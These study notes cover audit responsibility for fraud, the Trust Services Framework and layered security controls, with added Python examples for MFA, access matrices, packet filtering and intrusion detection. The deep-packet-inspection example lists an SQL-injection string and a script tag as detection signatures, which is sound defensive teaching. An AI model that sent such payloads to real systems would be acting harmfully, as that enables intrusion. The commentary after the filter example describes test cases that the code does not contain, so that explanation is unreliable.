CH2 GRAMLING


CH2 Auditing: Fraud

 Auditing standards historically reflected a belief that it is not reasonable to expect auditors to detect
cleverly implemented frauds.
 The general public, as reflected in the orientation of the PCAOB, expects auditors to have a responsibility to
detect and report on material frauds:
- The mission of the PCAOB is to restore the confidence of investors, and society generally, in the
independent auditors of companies.
- Repeated revelations of accounting scandals and audit failures have seriously damaged public
confidence.
- The detection of material fraud is a reasonable expectation of users of audited financial statements.
Society needs and expects assurance that financial information has not been materially misstated
because of fraud.
- Unless an independent audit can provide this assurance, it has little if any value to society.
 Professional auditing standards do require the auditor to plan and perform an audit that will detect material
misstatements resulting from fraud:
1. Begin the audit with a brainstorming session that focuses on how and where fraud could occur within
the organization.
2. Communicate with the audit committee and management about the risks of fraud and how they are
addressed.
3. Plan the audit to be responsive to the organization's susceptibility to fraud.

The Sarbanes–Oxley Act of 2002 as a Regulatory Response to Fraud

 Since the Sarbanes-Oxley Act was enacted, privately held organizations (which the Act does not cover) often
view its requirements as "best practice" and sometimes try to adhere to them even though they are not legally
required to do so.

 Due professional care – the standard of care expected of a competent auditing professional.
 Professional skepticism – an attitude that includes a questioning mind and a critical assessment of audit
evidence.
 Financial statement audit – a systematic process of objectively obtaining and evaluating evidence regarding
assertions about economic actions and events, to ascertain the degree of correspondence between those
assertions and established criteria, and communicating the results to interested users.

Objectives of external auditing
 Provide an opinion on the reliability (fair presentation) of the financial statements.
 As part of an integrated audit, also provide an opinion on the effectiveness of internal control over financial
reporting.
 For external auditing to have value, the public needs to have confidence in the objectivity and accuracy of the
opinions provided by external auditors.
 A free-market economy can exist only if reliable information is shared among the parties that have an
interest in the financial performance of an organization.
 The external audit is intended to enhance the confidence that users can place in management-prepared
financial statements.
 Unqualified audit report – the auditor has no reservations about management's financial statements (or, in an
integrated audit, about internal control).
 Adverse opinion on internal control – the auditor concludes that internal control over financial reporting is
not effective because a material weakness exists.
 If the auditor has reservations about the fair presentation of the financial statements, the audit report is
modified to explain the nature of those reservations.
External Auditing: A Special Function

 The auditor's most important client is the public, as represented by investors, lenders, workers, and others who
make decisions based on financial information about an organization.
 Auditing requires the highest level of technical competence, freedom from bias, and concern for the integrity
of the financial reporting process. In essence, auditors should view themselves as guardians of the capital
markets, and their work must be relevant and timely.
 The public expects auditors to
(a) find fraud,
(b) require accounting principles that best portray the spirit of the concepts adopted by accounting standard
setters, and
(c) be independent of management.
 Auditors must not only be independent in fact; they must also act in a manner that ensures they are
independent in appearance.
 Management and the audit committee expect cost-effective audits.
 Pressures on the auditing profession: keeping fees down, making careful decisions regarding independence, and
conducting a quality audit.

The Need for Unbiased Reporting and Independent Assurance


Effective capital markets require quality financial reporting. An organization's financial statements should
reflect a true and fair view of the organization's financial results. The statements should not favor one user
over another.

COBIT CONTROLS
 COBIT 4.1 defines 210 detailed control objectives for ensuring information integrity.
- Only a subset is relevant to external auditors; see ISACA's IT Control Objectives for Sarbanes-Oxley,
2nd Edition.
 AICPA and CICA information systems controls
- Controls for system and financial statement reliability (the Trust Services Framework, below).

 Trust Services Framework – developed jointly by the American Institute of Certified Public Accountants
(AICPA) and the Canadian Institute of Chartered Accountants (CICA).
- Provides guidance for assessing the reliability of information systems.
- Organizes IT-related controls into five principles that jointly contribute to systems reliability:
1. Security – access (both physical and logical) to the system and its data is controlled and restricted
to legitimate users.
- The foundation of systems reliability: security is necessary for achieving each of the other four
principles.
2. Confidentiality – sensitive organizational information (e.g., marketing plans, trade secrets) is
protected from unauthorized disclosure.
3. Privacy – personal information about customers, employees, suppliers, or business partners is
collected, used, disclosed, and maintained only in compliance with internal policies and external
regulatory requirements, and is protected from unauthorized disclosure.
4. Processing Integrity – data are processed accurately, completely, in a timely manner, and only with
proper authorization.
5. Availability – the system and its information are available to meet operational and contractual
obligations.

 Information security procedures restrict system access to authorized users only, thereby protecting the
confidentiality of sensitive organizational data and the privacy of personal information collected from
customers.
 Information security procedures protect processing integrity by preventing the submission of unauthorized or
fictitious transactions and preventing unauthorized changes to stored data or programs.
 Information security procedures protect against a variety of attacks, including viruses and worms, thereby
helping to ensure that the system is available when needed.
TWO FUNDAMENTAL INFORMATION SECURITY
CONCEPTS
I. Security Is a Management Issue, Not Just a Technology Issue
 Effective information security requires not only technological tools such as firewalls, antivirus software,
and encryption, but also senior management involvement and support throughout all phases of the security
life cycle.
 Security life cycle
1. First step: assess the information security threats that the organization faces and select an
appropriate response.
- Information security professionals have the expertise to identify potential threats and to estimate
their likelihood and impact.
- Senior management must choose which of the four risk responses (reduce, accept, share, or avoid)
to adopt, so that the resources invested in information security reflect the organization's risk
appetite.
2. Second Step: developing information security policies and
communicating them to all employees.
- Senior management must decide the sanctions they are willing to impose for noncompliance
- active support and involvement of top management is necessary to ensure that information
security training and communication is taken seriously.
- To be effective, this communication must involve more than just handing people a written
document or sending them an e-mail message and asking them to sign an acknowledgment
that they received and read the notice.
- employees must receive regular, periodic reminders about security policies and training on
how to comply with them.
3. Step 3: acquisition or building of specific technological tools.
- Senior management must authorize investing the necessary resources to mitigate the threats
identified and achieve the desired level of security.
4. Step 4: entails regular monitoring of performance to evaluate the effectiveness of the
organization’s information security program.
- management must periodically reassess the organization’s risk response
- when necessary, make changes to information security policies and invest in new solutions to
ensure that the organization’s information security efforts support its business strategy in a
manner that is consistent with management’s risk appetite.
II. Defense-in-Depth and the Time-Based Model of Information Security
 defense-in-depth – employing multiple layers of controls to avoid a single point of failure.
- Example: organizations use not only firewalls but also multiple authentication methods
(passwords, tokens, and biometrics) to restrict access to their information systems.
- Overlapping, complementary, and redundant controls increase overall effectiveness, because if one
control fails or is circumvented, another may still function as planned.
- Typically involves a combination of preventive, detective, and corrective controls:
preventive controls limit actions to specified individuals in accordance with the organization's
security policy; detective controls identify when a preventive control has failed or been bypassed;
corrective controls remedy the problem and restore normal operation.
 time-based model of security – implementing a combination of preventive, detective, and corrective
controls that protect information assets long enough for the organization to recognize that an attack is
occurring and to stop it before any information is lost or compromised.
- Gives management a way to identify the most cost-effective approach to improving security, by
comparing the effect of additional investment in preventive, detective, or corrective controls.
- The objective is expressed with three variables:
P = the time it takes an attacker to break through the organization's preventive controls
D = the time it takes to detect that an attack is in progress
C = the time it takes to respond to the attack and take corrective action
- If P > D + C, the organization's security procedures are effective; otherwise they are not.
- Caveat: P, D, and C are estimates, and P in particular depends on the skill and resources of the
attacker, so the model is a planning heuristic for comparing controls, not a guarantee.

Understanding Targeted Attacks


1. Conduct reconnaissance.
- Objective: learn as much as possible about the target and identify potential vulnerabilities.
2. Attempt social engineering.
- Use the information obtained during reconnaissance to trick people inside the organization into
granting access.
- social engineering – using deception to obtain unauthorized access to information resources.
- Examples: impersonating an executive on a call to a newly hired administrative assistant; posing as a
clueless temporary worker who cannot log onto the system; spear phishing that gets the victim to click an
embedded link or open an attachment, which executes a Trojan horse program that gives the attacker access
to the system.
3. Scan and map the target.
- Conduct more detailed reconnaissance to identify potential points of remote entry.
4. Research.
- Find known vulnerabilities in the programs identified and learn how to take advantage of them.
5. Execute the attack.
- The criminal takes advantage of a vulnerability to obtain unauthorized access to the target's
information system.
6. Cover tracks.
- Cover their tracks and create "back doors" that can be used to regain access if the initial attack is
discovered and controls are implemented to block that method of entry.
PREVENTIVE CONTROLS
People: Creation of a "security-conscious" culture
- Top management's attitude toward security creates either an internal environment that supports and
reinforces sound internal control or one that effectively negates written control policies.
- Top management must not only communicate the organization's security policies, but must also lead by example.
People: Training
- COBIT 5 identifies employee skills and competencies as another critical enabler for effective information
security.
- training is a critical preventive control.
- security awareness training is discussed as a key practice to support several of COBIT 5’s 32 management
processes.
- Training is especially needed to educate employees about social engineering attacks.
- trained to not allow other people to follow them through restricted access entrances. (Piggybacking)
 Role-playing exercises are particularly effective for increasing sensitivity to and skills for dealing with
social engineering attacks
- Security awareness training is important for senior management (e.g. spear phishing targeted at them)
- Training of information security professionals
 New developments in technology continuously create new security threats and make old solutions
obsolete.
- organization’s investment in security training will be effective only if management clearly demonstrates that it
supports employees who follow prescribed security policies.
 visible top management support for security enhances the effectiveness of all security policies.
 Top management needs to support the enforcement of sanctions, up to and including dismissal, against
employees who willfully violate security policies.

Process: User Access Controls


- organizations need to implement a set of controls designed to protect their information assets from unauthorized
use and access by employees.
- COBIT 5 management practice DSS05.04
 stresses the need for controls to manage user identity and logical access so that it is possible to
uniquely identify everyone who accesses the organization’s information system and track the actions that
they perform
 involves the use of two related but distinct types of user access controls: authentication controls and
authorization controls.
 Authentication controls - restrict who can access the organization’s information system
 Authorization controls - limit what those individuals can do once they have been granted access.

 Authentication Controls
o authentication - Verifying the identity of the person or device attempting to access the system.
o Objective: to ensure that only legitimate users can access the system.
o Three types of credentials can be used to verify a person’s identity:
1. Something they know, such as passwords or personal identification numbers (PINs)
2. Something they have, such as smart cards or ID badges
3. Some physical or behavioral characteristic (referred to as a biometric identifier), such as
fingerprints or typing patterns
- biometric identifier - A physical or behavioral characteristic that is used as an
authentication credential
o Passwords - most commonly used authentication method, and also the most controversial.
o Individually, each authentication method has its limitations.
 Passwords can be guessed, lost, written down, or given away.
 Physical identification techniques (cards, badges, USB devices, etc.) can be lost, stolen, or
duplicated.
 Even biometric techniques are not yet 100% accurate, sometimes rejecting legitimate users (e.g.,
voice recognition systems may not recognize an employee who has a cold) and sometimes
allowing access to unauthorized people.
 Some biometric techniques, such as fingerprints, carry negative connotations that may hinder
their acceptance.
 Biometric templates, such as the digital representation of an individual's fingerprints or voice,
must be stored somewhere, and that store must be tightly protected: unlike a password or a physical
token, a biometric characteristic cannot be replaced or changed if it is compromised.
o multifactor authentication - use of two or more types of authentication credentials in conjunction to
achieve a greater level of security
- Example - smart card in a card reader and enter a password provides much
stronger authentication than using either method alone.
o multimodal authentication - use of multiple authentication credentials of the same type to achieve a
greater level of security
- Example: online banking sites use several things that a person knows (password,
user ID, and recognition of a graphic image) for authentication.
o Both multifactor authentication and multimodal authentication are examples of applying the principle of
defense-in-depth.
o Authenticate not only people, but also every device attempting to connect to the network.
- Media access control (MAC) address – the unique identifier of each network interface card (NIC).
- A basic approach restricts network access to corporate-owned devices by comparing the device's MAC
address to a list of recognized addresses. Caveat: a MAC address is easily changed in software, so an
attacker who learns an approved address can impersonate that device; MAC filtering is a weak control on
its own.
- A stronger way to authenticate devices is to issue each device a digital certificate and require it to
prove possession of the matching private key when it connects (as in 802.1X with EAP-TLS).
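Worked example of multifactor authentication, added to these notes (not code from the original page or textbook): a password ("something you know", stored only as a salted PBKDF2 hash) combined with a time-based one-time code from an authenticator app ("something you have", TOTP per RFC 6238 built on HOTP per RFC 4226). The user record, the enrolled secret and the fixed clock value are constructed; the secret happens to be the RFC 4226 test-vector key so the codes can be checked against published values.

```python
"""Multifactor login: PBKDF2 password hash + TOTP code.

Added example for these notes; users, secrets and clock values are
constructed. Standard library only.
"""
import hashlib
import hmac
import os
import struct
import time
from typing import Optional


def hash_password(password: str, salt: Optional[bytes] = None):
    """Return (salt, PBKDF2-HMAC-SHA256 digest). A fresh random salt per
    user means two users with the same password get different hashes."""
    salt = salt if salt is not None else os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 200_000)
    return salt, digest


def check_password(password: str, salt: bytes, expected: bytes) -> bool:
    _, digest = hash_password(password, salt)
    return hmac.compare_digest(digest, expected)   # constant-time comparison


def hotp(secret: bytes, counter: int, digits: int = 6) -> str:
    """HOTP (RFC 4226): HMAC-SHA1 over the 8-byte big-endian counter,
    dynamic truncation, then the last `digits` decimal digits."""
    mac = hmac.new(secret, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = mac[-1] & 0x0F
    code = ((mac[offset] & 0x7F) << 24 | mac[offset + 1] << 16
            | mac[offset + 2] << 8 | mac[offset + 3])
    return str(code % 10 ** digits).zfill(digits)


def totp(secret: bytes, at: float, step: int = 30) -> str:
    """TOTP (RFC 6238): HOTP whose counter is the number of 30 s steps."""
    return hotp(secret, int(at // step))


def verify_totp(secret: bytes, code: str, at: float, step: int = 30, skew: int = 1) -> bool:
    """Accept the current window plus `skew` windows either side to
    tolerate clock drift; each comparison is constant-time."""
    counter = int(at // step)
    return any(hmac.compare_digest(hotp(secret, counter + k), code)
               for k in range(-skew, skew + 1) if counter + k >= 0)


# Constructed user record: salted password hash plus the TOTP seed enrolled
# in the user's authenticator app (in practice stored encrypted at rest).
_SALT, _HASH = hash_password("correct horse battery staple")
USERS = {
    "alice": {"salt": _SALT, "hash": _HASH, "totp_secret": b"12345678901234567890"},
}


def login(username: str, password: str, code: str, now: Optional[float] = None, skew: int = 1) -> bool:
    """Both factors must verify."""
    now = time.time() if now is None else now
    user = USERS.get(username)
    # Always run the password check (against a dummy hash for unknown
    # users) so response time does not reveal which usernames exist.
    salt = user["salt"] if user else _SALT
    expected = user["hash"] if user else bytes(32)
    pw_ok = check_password(password, salt, expected)
    if user is None or not pw_ok:
        return False
    return verify_totp(user["totp_secret"], code, now, skew=skew)


if __name__ == "__main__":
    t = 1_700_000_000                       # fixed clock so the run is repeatable
    good = totp(USERS["alice"]["totp_secret"], t)
    print(login("alice", "correct horse battery staple", good, now=t))   # True
    print(login("alice", "wrong password", good, now=t))                 # False
```

Knowing the password alone, or holding the phone alone, is not enough: both checks must pass, which is the defense-in-depth point the notes make about combining factor types.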
 Authorization Controls
o authorization - The process of restricting access of authenticated users to specific portions of the
system and limiting what actions they are permitted to perform
- COBIT 5 management practice DSS06.03
- objective: structure an individual employee’s rights and privileges in a manner that
establishes and maintains adequate segregation of duties.
- Example: a customer service representative should not be authorized to access the
payroll system.
o Authorization controls are often implemented by creating an access control matrix.
- access control matrix – a table used to implement authorization controls: rows identify users (or
roles), columns identify resources (files, programs, database tables), and each cell records the
actions that user may perform on that resource.
o compatibility test – matching the user's authentication credentials against the access control matrix to
determine whether that employee should be allowed to access that resource and perform the requested
action.
o Regularly update the access control matrix to reflect changes in job duties due to promotions or
transfers. Otherwise, over time an employee may accumulate a set of rights and privileges that is
incompatible with proper segregation of duties.
o To achieve even greater control and segregation of duties, use business process management systems to
embed authorization into automated business processes, rather than relying on a static access control
matrix alone.
- Example: particular employee may be permitted to access credit information about the customer
who is currently requesting service, but simultaneously prevented from “browsing” through the rest
of the customer file
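Worked example, added to these notes (not from the original page or textbook), of the three ideas above in code: an access control matrix, the compatibility test run against it, a segregation-of-duties check that finds users who have accumulated incompatible rights after a transfer, and a process-embedded rule that lets a representative read credit data only for the customer currently being served. The users, resources, incompatible-duty pairs and customer records are all constructed.

```python
"""Authorization controls: access control matrix, compatibility test,
segregation-of-duties review, and process-embedded authorization.

Added example for these notes; all users, resources and records are
constructed.
"""
from collections import defaultdict

# Access control matrix: user -> resource -> set of permitted actions
ACM = {
    "csr_dana":   {"customers": {"read"}, "orders": {"read", "create"}},
    "ap_clerk":   {"vendors": {"read", "create"}, "payments": {"read"}},
    "controller": {"vendors": {"read"}, "payments": {"read", "approve"},
                   "payroll": {"read"}},
}

# Pairs of (resource, action) that one individual must never hold together
INCOMPATIBLE_DUTIES = [
    (("vendors", "create"), ("payments", "approve")),   # create a fake vendor, then pay it
    (("payroll", "update"), ("payroll", "approve")),
]


def compatibility_test(user, resource, action):
    """Does the matrix permit this authenticated user to take this action
    on this resource? Unknown users or resources are denied by default."""
    return action in ACM.get(user, {}).get(resource, set())


def grant(user, resource, action):
    """Add a right (e.g. on promotion). Old rights are NOT removed here,
    which is exactly how incompatible combinations accumulate."""
    ACM.setdefault(user, {}).setdefault(resource, set()).add(action)


def sod_violations():
    """Users holding both halves of an incompatible pair."""
    out = defaultdict(list)
    for user in ACM:
        for a, b in INCOMPATIBLE_DUTIES:
            if compatibility_test(user, *a) and compatibility_test(user, *b):
                out[user].append((a, b))
    return dict(out)


# Process-embedded authorization: which customer is each rep serving now?
ACTIVE_CASE = {"csr_dana": "C-1001"}
CREDIT = {"C-1001": "limit 5,000", "C-1002": "limit 20,000"}   # constructed


def read_credit(user, customer_id):
    """Allowed only if the matrix permits reading customers AND the record
    belongs to the customer in the rep's open case; browsing is refused."""
    if not compatibility_test(user, "customers", "read"):
        raise PermissionError("no read right on customers")
    if ACTIVE_CASE.get(user) != customer_id:
        raise PermissionError("customer is not the one currently being served")
    return CREDIT[customer_id]


if __name__ == "__main__":
    print(compatibility_test("csr_dana", "payroll", "read"))   # False
    print(sod_violations())                                   # {} before the promotion
    grant("ap_clerk", "payments", "approve")                  # promoted, old rights kept
    print(sod_violations())                                   # ap_clerk flagged
    print(read_credit("csr_dana", "C-1001"))
```

Running the review after every change in job duties is the control the notes call for; the matrix itself cannot express "only the customer you are serving right now", which is why that rule is enforced in the process code instead.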
IT Solutions: Antimalware Controls
- Malware (e.g., viruses, worms, keystroke logging software, etc.) is a major threat.
 can damage or destroy information or provide a means for unauthorized access.
 COBIT 5 section DSS05.01 lists malware protection as one of the keys to effective security,
specifically recommending:
1. Malicious software awareness education,
2. Installation of antimalware protection tools on all devices,
3. Centralized management of patches and updates to antimalware software,
4. Regular review of new malware threats,
5. Filtering of incoming traffic to block potential sources of malware, and
6. Training employees not to install shared or unapproved software.

IT Solutions: Network Access Controls


- Most organizations provide employees, customers, and suppliers with remote access to their information
systems.
 Usually access occurs via the Internet, though some organizations operate their own proprietary networks
or provide direct dial-up access by modem.
- COBIT 5 management practice DSS05.02 addresses the security of the organization's network and all means of
connecting to it.
 Perimeter Defense: Routers, Firewalls, and Intrusion Prevention Systems
1. border router – a device that connects an organization's information system to the Internet.
2. firewall – a special-purpose hardware device, or software running on a general-purpose computer, that
controls both inbound and outbound communication between the system behind the firewall and other
networks.
- Sits behind the border router.
3. demilitarized zone (DMZ) – a separate network, located outside the organization's internal information
system, that hosts the servers which must be reachable from the Internet (e.g., web and e-mail servers)
and permits controlled access to them.
 How Information Flows on Networks: Overview of TCP/IP and Ethernet
- When you send a file (document, spreadsheet, database, etc.) to another person or to a printer, the entire
file is seldom transmitted intact.
- In most cases it is broken up into a series of small pieces (packets) that are sent individually and
reassembled on delivery.
 Almost every local area network uses the Ethernet protocol, whose frames carry a payload of at most about
1,500 bytes (the Ethernet MTU); after the IP and TCP headers are subtracted, roughly 1,460 bytes of file data
fit in each packet.
- A file of a few megabytes is therefore divided into thousands of packets.
 Each packet must be properly labeled so that the entire file can be correctly reassembled at the
destination. The information needed to do that is carried in three headers:
 Transmission Control Protocol (TCP) – the TCP header contains the sequence number that gives the
packet's position relative to the entire stream, and the port numbers on the sending and receiving
devices that identify which application the data comes from and which one it is to be delivered to.
 Internet Protocol (IP) – the IP header contains the network addresses (IP addresses) of the sending and
receiving devices.
 Routers – special-purpose devices that read the source and destination address fields in IP packet
headers to decide where to send (route) the packet next.
 Ethernet header – contains the MAC addresses of the sending and receiving devices, which are used to
control the flow of traffic on the local area network (LAN).
Figure 1: Packet Structure

 Controlling Access by Filtering Packets.


- access control list (ACL) – an ordered set of IF-THEN rules used to determine what to do with arriving packets.
- If a packet's destination IP address belongs to the organization, the rules in the border router's ACL examine
the source address field in the IP header to block packets from specific undesirable sources (e.g., known
gambling or porn sites).
 packet filtering – a process that uses various fields in a packet's IP and TCP headers to decide what to
do with the packet.
- Fast and able to catch patently undesirable traffic, but its effectiveness is limited.
- Undesirable traffic gets through if the source IP address is not on the list of unacceptable sources, or
if the sender deliberately forges (spoofs) the source address, because nothing in the header proves who
actually sent the packet.
- All other packets with the organization's IP address in the destination field are passed to the main
firewall for further screening.
- The rules in the main firewall's ACL look at other fields in the IP and TCP headers (e.g., protocol and
destination port) to determine whether to block the incoming packet or permit it to enter.
- Firewalls do not block all traffic; they filter it.
 deep packet inspection – a process that examines the data in the body of a TCP packet to control traffic,
rather than looking only at the information in the IP and TCP headers.
- More effective, because the packet is opened and the actual data (the portion of the file contained in
the TCP packet) are examined, but slower than header-only filtering.
- Header-only filtering cannot see an attack carried inside an otherwise legitimate-looking packet, so a
firewall that performs deep packet inspection is usually placed in front of specific servers such as the
web server.
4. intrusion prevention system (IPS) – software or hardware that monitors patterns in the traffic flow to
identify and automatically block attacks.
- Examining a pattern of traffic is often the only way to identify undesirable activity; no single packet
looks wrong.
- Two primary techniques identify undesirable traffic patterns:
1. Simplest approach: compare traffic patterns to a database of signatures of known attacks.
2. More complicated approach: develop a profile of "normal" traffic and use statistical analysis to
identify traffic that does not fit that profile. This blocks not only known attacks, for which signatures
already exist, but also new attacks that deviate from the baseline.
- Example: a network IPS could identify that a sequence of packets attempting to connect to various TCP
ports on the e-commerce web server is an indicator of an attempt to scan and map that server.
- A network IPS consists of a set of sensors and a central monitoring unit that analyzes the data collected.
Sensors must be installed on each network segment over which real-time monitoring is desired.
- IPS problems: the danger of false alarms, which result in blocking legitimate traffic, and the fact that
deep packet inspection slows overall throughput.
- IPSs do not replace the need for firewalls; they are a complementary tool that provides yet another layer of
perimeter defense.
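Worked example, added to these notes (not from the original page or textbook), covering the packet structure and the packet-filtering discussion above: it builds a raw Ethernet + IPv4 + TCP frame, parses the header fields a filter needs, runs the packet through an ordered IF-THEN ACL that looks only at headers, and then applies a toy deep-packet-inspection rule to the TCP payload. The addresses, ACL rules, payload signatures and frames are all constructed (the IP ranges are the RFC 5737 documentation blocks); IP and TCP checksums are left zero because nothing here verifies them.

```python
"""Header parsing, header-only packet filtering and deep packet
inspection. Added example for these notes; frames, addresses and rules
are constructed. Standard library only.
"""
import ipaddress
import struct


def build_frame(src_mac, dst_mac, src_ip, dst_ip, src_port, dst_port, seq, payload):
    """Assemble Ethernet + IPv4 + TCP headers around a payload."""
    eth = (bytes.fromhex(dst_mac.replace(":", "")) + bytes.fromhex(src_mac.replace(":", ""))
           + b"\x08\x00")                                   # EtherType 0x0800 = IPv4
    total_len = 20 + 20 + len(payload)
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, total_len, 0, 0x4000, 64, 6, 0,
                     ipaddress.IPv4Address(src_ip).packed, ipaddress.IPv4Address(dst_ip).packed)
    tcp = struct.pack("!HHIIBBHHH", src_port, dst_port, seq, 0, 5 << 4, 0x18, 65535, 0, 0)
    return eth + ip + tcp + payload


def parse_frame(frame):
    """Pull out the fields the filters need plus the TCP payload."""
    dst_mac, src_mac = frame[0:6], frame[6:12]
    ethertype = struct.unpack("!H", frame[12:14])[0]
    if ethertype != 0x0800:
        raise ValueError("not IPv4")
    ip = frame[14:]
    ihl = (ip[0] & 0x0F) * 4                                # IP header length in bytes
    tcp = ip[ihl:]
    src_port, dst_port, seq = struct.unpack("!HHI", tcp[:8])
    data_off = (tcp[12] >> 4) * 4                           # TCP header length in bytes
    return {
        "src_mac": src_mac.hex(":"), "dst_mac": dst_mac.hex(":"),
        "proto": ip[9],
        "src_ip": ipaddress.IPv4Address(ip[12:16]), "dst_ip": ipaddress.IPv4Address(ip[16:20]),
        "src_port": src_port, "dst_port": dst_port, "seq": seq,
        "payload": tcp[data_off:],
    }


# Ordered IF-THEN rules: first match wins, implicit deny at the end.
# (source network, destination network, destination port or None, action)
ORG_NET = ipaddress.ip_network("203.0.113.0/24")            # constructed
ACL = [
    (ipaddress.ip_network("198.51.100.0/24"), ORG_NET, None, "deny"),   # known-bad source
    (ipaddress.ip_network("0.0.0.0/0"), ORG_NET, 443, "permit"),        # HTTPS to the web server
    (ipaddress.ip_network("0.0.0.0/0"), ORG_NET, 80, "permit"),
    (ipaddress.ip_network("192.0.2.0/24"), ORG_NET, 22, "permit"),      # SSH from the admin net only
]


def packet_filter(pkt):
    """Header-only filtering: fast, but it trusts the source address field."""
    for src_net, dst_net, port, action in ACL:
        if (pkt["src_ip"] in src_net and pkt["dst_ip"] in dst_net
                and (port is None or pkt["dst_port"] == port)):
            return action
    return "deny"


BAD_PAYLOAD_MARKERS = [b"' OR '1'='1", b"<script>"]         # toy DPI signatures


def deep_packet_inspection(pkt):
    """Look inside the TCP payload; catches what header filtering cannot."""
    return "deny" if any(m in pkt["payload"] for m in BAD_PAYLOAD_MARKERS) else "permit"


def screen(frame):
    """Border-router style header filter first, then DPI on what it passes."""
    pkt = parse_frame(frame)
    verdict = packet_filter(pkt)
    return verdict if verdict == "deny" else deep_packet_inspection(pkt)


if __name__ == "__main__":
    web = build_frame("aa:bb:cc:dd:ee:01", "aa:bb:cc:dd:ee:02", "192.0.2.7", "203.0.113.10",
                      51000, 443, 1, b"GET / HTTP/1.1\r\n")
    print(screen(web))   # permit
```

Note the spoofing case in the assertions: a frame whose source field claims to be 192.0.2.7 is permitted to port 22 regardless of where it really came from, which is the limitation the notes describe, while the SQL-injection payload to port 443 passes the header filter and is caught only by inspecting the body.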

 Using Defense-in-Depth to Restrict Network Access


- Using multiple perimeter filtering devices is more efficient and effective than relying on one.
- Most organizations use border routers to quickly filter out obviously bad packets and pass the rest to
the main firewall.
- The main firewall does more detailed checking, and then other firewalls perform deep packet inspection to
more fully protect specific devices such as the organization's web server and e-mail server.
- An IPS monitors the traffic passed by the firewalls to identify and block suspicious traffic patterns
that may indicate an attack in progress.
- Defense-in-depth also applies inside the perimeter: multiple internal firewalls segment different
departments within the organization.
- Internal firewalls help restrict what data and which portions of the organization's information system
particular employees can access, and limit how far an attacker who gets inside can move.
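Worked example, added to these notes (not from the original page or textbook), of the two IPS detection techniques described above applied to a connection log: a signature rule that flags a source touching many distinct TCP ports on one host within a short window (the scan-and-map pattern the notes mention), and an anomaly rule that builds a per-source connection-rate baseline from earlier traffic and flags later sources well above it. The log lines, window sizes and thresholds are constructed.

```python
"""Signature and anomaly detection over a connection log, as an IPS would
apply them. Added example for these notes; the log and thresholds are
constructed. Standard library only.
"""
from collections import defaultdict
import statistics

# Constructed log: epoch seconds, source IP, destination IP, destination port
LOG = """\
1000 192.0.2.10 203.0.113.10 443
1003 192.0.2.11 203.0.113.10 443
1007 192.0.2.10 203.0.113.10 443
1010 192.0.2.12 203.0.113.10 80
1015 192.0.2.11 203.0.113.10 443
1020 192.0.2.13 203.0.113.10 443
1030 198.51.100.7 203.0.113.10 21
1030 198.51.100.7 203.0.113.10 22
1031 198.51.100.7 203.0.113.10 23
1031 198.51.100.7 203.0.113.10 25
1032 198.51.100.7 203.0.113.10 80
1032 198.51.100.7 203.0.113.10 110
1033 198.51.100.7 203.0.113.10 143
1033 198.51.100.7 203.0.113.10 443
1034 198.51.100.7 203.0.113.10 3306
1034 198.51.100.7 203.0.113.10 8080
1040 192.0.2.10 203.0.113.10 443
"""


def parse_log(text):
    events = []
    for line in text.splitlines():
        ts, src, dst, port = line.split()
        events.append((int(ts), src, dst, int(port)))
    return events


def port_scan_signature(events, window=10, min_ports=8):
    """Signature: flag (src, dst) pairs that hit at least `min_ports`
    distinct ports within `window` seconds (sliding window per pair)."""
    by_pair = defaultdict(list)
    for ts, src, dst, port in events:
        by_pair[(src, dst)].append((ts, port))
    alerts = set()
    for pair, hits in by_pair.items():
        hits.sort()
        for i, (t0, _) in enumerate(hits):
            ports = {p for t, p in hits[i:] if t - t0 <= window}
            if len(ports) >= min_ports:
                alerts.add(pair)
                break
    return alerts


def rate_anomalies(events, baseline_until, window=10, z=3.0):
    """Anomaly: learn connections-per-window per source from events before
    `baseline_until`, then flag later sources more than `z` standard
    deviations above the baseline mean. Catches scans with no signature."""
    def counts(evs):
        c = defaultdict(int)
        for ts, src, _, _ in evs:
            c[(src, ts // window)] += 1
        return c
    base = list(counts([e for e in events if e[0] < baseline_until]).values())
    mean, sd = statistics.mean(base), statistics.pstdev(base)
    threshold = mean + z * max(sd, 1.0)   # floor the sd so a flat baseline still has slack
    later = counts([e for e in events if e[0] >= baseline_until])
    return {src for (src, _), n in later.items() if n > threshold}


if __name__ == "__main__":
    evs = parse_log(LOG)
    print(port_scan_signature(evs))               # the scanner, by (src, dst)
    print(rate_anomalies(evs, baseline_until=1025))
```

The tuning knobs (`min_ports`, `window`, `z`) are where the false-alarm problem the notes mention lives: loosen them and a busy but legitimate client gets blocked, tighten them and a slow scan spread over hours slips under the window.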

 Securing Dial-Up Connections


- Remote Authentication Dial-In User Service (RADIUS) - A standard method for verifying the identity
of users attempting to connect via dial-in access
- Dial-in users connect to a remote access server and submit their log-in credentials; only after the user
has been authenticated is access to the internal corporate network granted.
- Modems are cheap and easy to install, so employees are often tempted to install them on their desktop
workstations without seeking permission or notifying anyone.
- Such connections are not filtered by the main firewall, and employees seldom configure any strong
authentication controls on them.
- A single unauthorized ("rogue") modem connected to an employee's desktop workstation therefore creates a
"back door" through which attackers can often easily compromise the internal network.
- The most efficient and effective way to periodically check for rogue modems is to use war dialing software.
o war dialing – searching for an idle modem by programming a computer to dial thousands of phone lines.
 Securing Wireless Access
- Wireless access is convenient and easy, but it also provides another venue for attack and extends the
perimeter that must be protected
- The following procedures need to be followed to adequately secure wireless access:
o Turn on the available security features (at a minimum, current encryption such as WPA2 or WPA3 rather than
the broken WEP protocol).
o Authenticate all devices attempting to establish wireless access to the network before assigning them an
IP address.
- This can be done by treating incoming wireless connections as attempts to access the network from the
Internet and routing them first through a RADIUS server or other authentication device.
o Configure all authorized wireless devices to operate only in infrastructure mode, which forces the
device to connect only through wireless access points. (Wireless devices can also operate in ad hoc
mode, which lets them communicate directly with any other wireless device. This is a security threat
because it creates peer-to-peer networks with little or no authentication control.)
o Use noninformative names for the access point's network name, called a service set identifier (SSID).
SSIDs such as "payroll," "finance," or "R&D" are more obvious targets than generic SSIDs such as "A1" or
"X2." (A bland or hidden SSID only reduces attention; it is not an access control and does not replace
authentication and encryption.)
o Reduce the broadcast strength of wireless access points, locate them in the interior of the building, and
use directional antennas to make unauthorized reception off-premises more difficult.
- Special paint and window films can also be used to contain wireless signals within a building.
o Encrypt all wireless traffic.
- Essential to protect the confidentiality and privacy of wireless communications, because they are
transmitted "over the air" and are therefore inherently susceptible to interception.
IT Solutions: Device and Software Hardening Controls
- endpoints - Collective term for the workstations, servers, printers, and other devices that comprise an
